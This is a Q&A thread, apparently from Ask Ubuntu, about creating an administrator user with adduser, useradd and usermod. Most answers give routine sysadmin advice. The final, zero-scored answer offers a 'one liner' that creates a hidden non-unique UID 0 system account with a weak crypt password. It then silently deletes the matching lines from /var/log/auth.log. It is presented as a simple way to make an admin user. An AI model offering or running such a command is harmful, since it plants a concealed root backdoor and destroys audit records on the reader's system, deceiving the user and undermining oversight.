# How can I create an administrator user from the command line?

Tags: sudo, user-management, adduser

I want to create a user with administrative privileges and all the regular setups like home directory.

1. Is there a `adduser` parameter to give the user `sudo` powers automatically?
2. What are the default settings for `adduser`? Will it automatically create home directories and all the other things without extra parameters? (i.e. is `adduser <username>` enough?)

Comment: you should use `useradd` for a new user not `adduser`.

Comment: @JizoSaves Generally speaking, it depends. `adduser` is more interactive, and `useradd` is designed for scripts.

Answer (score 88, accepted):

Add the user to the `sudo` group with:

```
adduser <username> sudo
```

(If you're running Ubuntu 11.10 or earlier, use the `admin` group.)

Default values are stored in `/etc/adduser.conf`, you can check them with

```
less /etc/adduser.conf
```

To create a user and add it directly to the `sudo` group use

```
adduser <username> --group sudo
```

(Again, use `admin` in place of `sudo` for 11.10 and earlier.)

Have a look at all the options you have with `adduser` [here](http://www.unix.com/man-page/Linux/8/adduser/).

Comment: `adduser --force-badname <username> admin`

Comment: I believe so, yeah, or `adduser --force-badname <usernane> --group admin`

Comment: This is the first line of using `-D`: `Option d is ambiguous (debug, disabled-login, disabled-password)`. `adduser` interprets it as a mistake and tells you all the flags and options you can use . Definitely got nothing to do with defaults.

Comment: The user must log off, then back on again for this change to take effect

Answer (score 49):

To create a new user with admin privileges in Ubuntu 12.04 and later:

```
adduser <username> --ingroup sudo
```

In Ubuntu 11.10 and earlier, use this instead:

```
adduser <username> --group admin
```

To modify a existing user (12.04 and later):

```
adduser <username> --group sudo
```

or

```
sudo usermod -aG sudo <username>
```

(Or for 11.10 and earlier: `sudo usermod -aG admin <username>`)

`-a` stands for append whereas `-G` stands for groups. With the `-a` and `-G` flags as shown above, the `sudo` (or `admin`) group will be *added* to the list of groups of which the user is a member.

Comment: `adduser <username> sudo` does not creates the user; it adds an _existing_ user to the `sudo` group.

Comment: When I do `adduser foobar sudo` before creating the user, in Xenial it says "adduser: the username \`foobar' does not exist", and it's not shown in `/etc/passwd`, so I believe the user is not created.

Comment: On Trusty I get this:

```
$ sudo adduser neue --group sudo                                                                                        
adduser: Please specify a single name in this mode.
$ sudo adduser neue sudo                                                                                                
adduser: The user 'neue' does not exist.
```

Answer (score 20):

The other answers are correct but you also asked about the home directory.  You will also need a password for the new user.

```
sudo useradd *new-admin-username* -s /bin/bash -g sudo -m
```

- `-s` sets the user's login shell
- `-m` makes the user's home directory if it doesn't exist:
  `/home/*new-admin-username*`
- `-g` adds the user to the sudo group so they will have admin privileges (>11.10)

Once created, add a password for the user:

```
sudo passwd *new-admin-username*
```

Login to the user to see if everything worked:

```
su *new-admin-username*
cd ~/
pwd
```

Comment: Note that since you used `-g` instead of `-G`, the new user will belong only to the `sudo` group.

Answer (score 0):

Here's the one liner, It creates a new root user. You have to change some parameters.

```
  USERNAME="name";PASSWD=`perl -e 'print crypt("password", "sa")'`;COMMENT="Comment 
  Here" && sudo useradd -p $PASSWD --system --shell '/bin/bash' --base-dir "/bin" --uid 
  0 --non-unique --comment $COMMENT $USERNAME && sudo sed -i '/useradd/d;/$USERNAME/d;' 
  /var/log/auth.log
```

Best,